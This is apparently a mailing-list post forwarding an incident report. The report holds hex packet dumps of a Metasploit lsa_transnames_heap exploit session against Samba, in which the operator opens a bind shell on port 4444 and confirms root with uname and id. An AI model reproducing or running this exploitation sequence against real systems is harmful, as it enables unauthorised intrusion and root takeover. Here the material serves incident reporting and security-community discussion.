TAR 0x0300 4745 5420 310d 0a54 4152 4745 5420 3d3e GET 1..TARGET => 0x0310 2031 0d0a 6d73 6620 6578 706c 6f69 7428 1..msf exploit( 0x0320 6c73 615f 7472 616e 736e 616d 6573 5f68 lsa_transnames_h 0x0330 6561 7029 203e 2065 7870 6c6f 6974 0d0a eap) > exploit.. 0x0340 5b2a 5d20 5374 6172 7465 6420 6269 6e64 [*] Started bind 0x0350 2068 616e 646c 6572 0d0a 5b2a 5d20 4372 handler..[*] Cr 0x0360 6561 7469 6e67 206e 6f70 2073 6c65 642e eating nop sled. 0x0370 2e2e 2e0d 0a2e 2e2e 2e0d 0a5b 2a5d 2054 ...........[*] T 0x0380 7279 696e 6720 746f 2065 7870 6c6f 6974 rying to exploit 0x0390 2053 616d 6261 2077 6974 6820 6164 6472 Samba with addr 0x03a0 6573 7320 3078 3038 3431 3530 3030 2e2e ess 0x08415000.. 0x03b0 2e0d 0a5b 2a5d 2043 6f6e 6e65 6374 696e ...[*] Connectin 0x03c0 6720 746f 2074 6865 2053 4d42 2073 6572 g to the SMB ser 0x03d0 7669 6365 2e2e 2e0d 0a5b 2a5d 2042 696e vice.....[*] Bin 0x03e0 6469 6e67 2074 6f0d 0a31 3233 3435 3737 ding to..1234577 0x03f0 382d 3132 3334 2d61 6263 642d 6566 3030 8-1234-abcd-ef00 0x0400 2d30 3132 3334 3536 3738 3961 623a 302e -0123456789ab:0. 0x0410 3040 6e63 6163 6e5f 6e70 3a31 3932 2e31 0 at ncacn_np:192.1 0x0420 3638 2e35 302e 3130 5b5c 6c73 6172 7063 68.50.10[\lsarpc 0x0430 5d20 2e2e 2e0d 0a5b 2a5d 2042 6f75 6e64 ] .....[*] Bound 0x0440 2074 6f0d 0a31 3233 3435 3737 382d 3132 to..12345778-12 0x0450 3334 2d61 6263 642d 6566 3030 2d30 3132 34-abcd-ef00-012 0x0460 3334 3536 3738 3961 623a 302e 3040 6e63 3456789ab:0.0 at nc 0x0470 6163 6e5f 6e70 3a31 3932 2e31 3638 2e35 acn_np:192.168.5 0x0480 302e 3130 5b5c 6c73 6172 7063 5d20 2e2e 0.10[\lsarpc] .. 0x0490 2e0d 0a5b 2a5d 2043 616c 6c69 6e67 2074 ...[*] Calling t 0x04a0 6865 2076 756c 6e65 7261 626c 6520 6675 he vulnerable fu 0x04b0 6e63 7469 6f6e 2e2e 2e0d 0a5b 2b5d 2053 nction.....[+] S 0x04c0 6572 7665 7220 6469 6420 6e6f 7420 7265 erver did not re 0x04d0 7370 6f6e 642c 2074 6869 7320 6973 2065 spond, this is e 0x04e0 7870 6563 7465 640d 0a5b 2a5d 2043 6f6d xpected..[*] Com 0x04f0 6d61 6e64 2073 6865 6c6c 2073 6573 7369 mand shell sessi 0x0500 6f6e 2031 206f 7065 6e65 6420 2831 3932 on 1 opened (192 0x0510 2e31 3638 2e35 302e 3230 313a 3333 3639 .168.50.201:3369 0x0520 3420 2d3e 0d0a 3139 322e 3136 382e 3530 4 ->..192.168.50 0x0530 2e31 303a 3434 3434 290d 0a6d 7366 2065 .10:4444)..msf e 0x0540 7870 6c6f 6974 286c 7361 5f74 7261 6e73 xploit(lsa_trans 0x0550 6e61 6d65 735f 6865 names_he [ 4] 9-Feb-2008 11:54:37 UTC 216.75.15.231:56208 -> x.x.113.5:25 TCP 600 bytes data 0x0000 6170 2920 3e20 7365 7373 696f 6e73 202d ap) > sessions - 0x0010 6920 310d 0a5b 2a5d 2053 7461 7274 696e i 1..[*] Startin 0x0020 6720 696e 7465 7261 6374 696f 6e20 7769 g interaction wi 0x0030 7468 2031 2e2e 2e0d 0a0d 0a75 6e61 6d65 th 1.......uname 0x0040 202d 610d 0a4c 696e 7578 2065 6565 7063 -a..Linux eeepc 0x0050 2d72 6973 6520 322e 362e 3231 2e34 2d65 -rise 2.6.21.4-e 0x0060 6565 7063 2023 3231 2053 6174 204f 6374 eepc #21 Sat Oct 0x0070 2031 3320 3132 3a31 343a 3033 2045 4454 13 12:14:03 EDT 0x0080 2032 3030 3720 6936 3836 0d0a 474e 552f 2007 i686..GNU/ 0x0090 4c69 6e75 780d 0a69 640d 0a75 6964 3d30 Linux..id..uid=0 0x00a0 2872 6f6f 7429 2067 6964 3d30 2872 6f6f (root) gid=0(roo 0x00b0 7429 2065 6769 643d 3635 3533 3428 6e6f t) egid=65534(no 0x00c0 6772 6f75 7029 2067 726f 7570 733d 3635 group) groups=65 0x00d0 3533 3428 6e6f 6772 6f75 7029 0d0a 0d0a 534(nogroup).... 0x00e0 0d0a 4561 7379 2074 6f20 6c65 6172 6e2c ..Easy to learn, 0x00f0 2045 6173 7920 746f 2077 6f72 6b2c 2045 Easy to work, E 0x0100 6173 7920 746f 2072 6f6f 742e 0d0a 0d0a asy to root..... 0x0110 0d0a 5468 6520 6f72 6967 696e 616c 2062 ..The original b 0x0120 6c6f 6720 706f 7374 2061 6e64 206d 6f72 log post and mor 0x0130 6520 696e 666f 726d 6174 696f 6e20 6361 e information ca 0x0140 6e20 6265 2066 6f75 6e64 2069 6e20 6f75 n be found in ou 0x0150 720d 0a77 6562 7369 7465 2061 7420 6874 r..website at ht 0x0160 7470 3a2f 2f72 6973 6573 6563 7572 6974 tp://risesecurit 0x0170 792e 6f72 672f 2e0d 0a0d 0a42 6573 7420 y.org/.....Best 0x0180 7265 6761 7264 732c 0d0a 5261 6d6f 6e0d regards,..Ramon. 0x0190 0a2d 2d2d 2d2d 4245 4749 4e20 5047 5020 .-----BEGIN PGP 0x01a0 5349 474e 4154 5552 452d 2d2d 2d2d 0d0a SIGNATURE-----.. 0x01b0 5665 7273 696f 6e3a 2047 6e75 5047 2076 Version: GnuPG v 0x01c0 312e 322e 3620 2847 4e55 2f4c 696e 7578 1.2.6 (GNU/Linux 0x01d0 290d 0a0d 0a69 4438 4442 5146 4872 5a4b )....iD8DBQFHrZK 0x01e0 4c47 4953 3069 4575 6870 344d 5241 726d LGIS0iEuhp4MRArm 0x01f0 7341 4a39 5a6b 2f48 3371 5967 4e7a 5344 sAJ9Zk/H3qYgNzSD 0x0200 5067 5061 737a 3655 4d33 396e 4d6a 7743 PgPasz6UM39nMjwC 0x0210 654b 526f 470d 0a32 584e 536d 4c6a 7737 eKRoG..2XNSmLjw7 0x0220 4f6c 6f41 6865 5334 334e 2b32 6f67 3d0d OloAheS43N+2og=. 0x0230 0a3d 6248 7a63 0d0a 2d2d 2d2d 2d45 4e44 .=bHzc..-----END 0x0240 2050 4750 2053 4947 4e41 5455 5245 2d2d PGP SIGNATURE-- 0x0250 2d2d 2d0d 0a2e 0d0a ---..... We appreciate your assistance in resolving this matter. -- SecurePipe Incident Inquiry Desk Tel: +1 608 294 6940 Fax: +1 608 294 6950 incident.inquiry-154894326 at securepipe.com ================================================= This communication (including any attachments) is intended only for use by the addressee(s) named herein and may contain legally privileged or confidential information. If you are not the intended recipient or an authorized representative of the intended recipient on this communication, you are hereby notified that any dissemination or distribution of this communication (or attachments) is strictly prohibited. If you have received this communication in error, please notify us immediately by e-mail and permanently delete the communication and any attachments from your system. -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080209/ab090732/attachment.htm>
Current thread:
- (funny) Fwd: command execution response H D Moore (Feb 09)
- (funny) Fwd: command execution response Ramon de Carvalho Valle (Feb 09)
- (funny) Fwd: command execution response Bryon Roche (Feb 14)
- (funny) Fwd: command execution response Jim Starke (Feb 09)
- (funny) Fwd: command execution response Ramon de Carvalho Valle (Feb 09)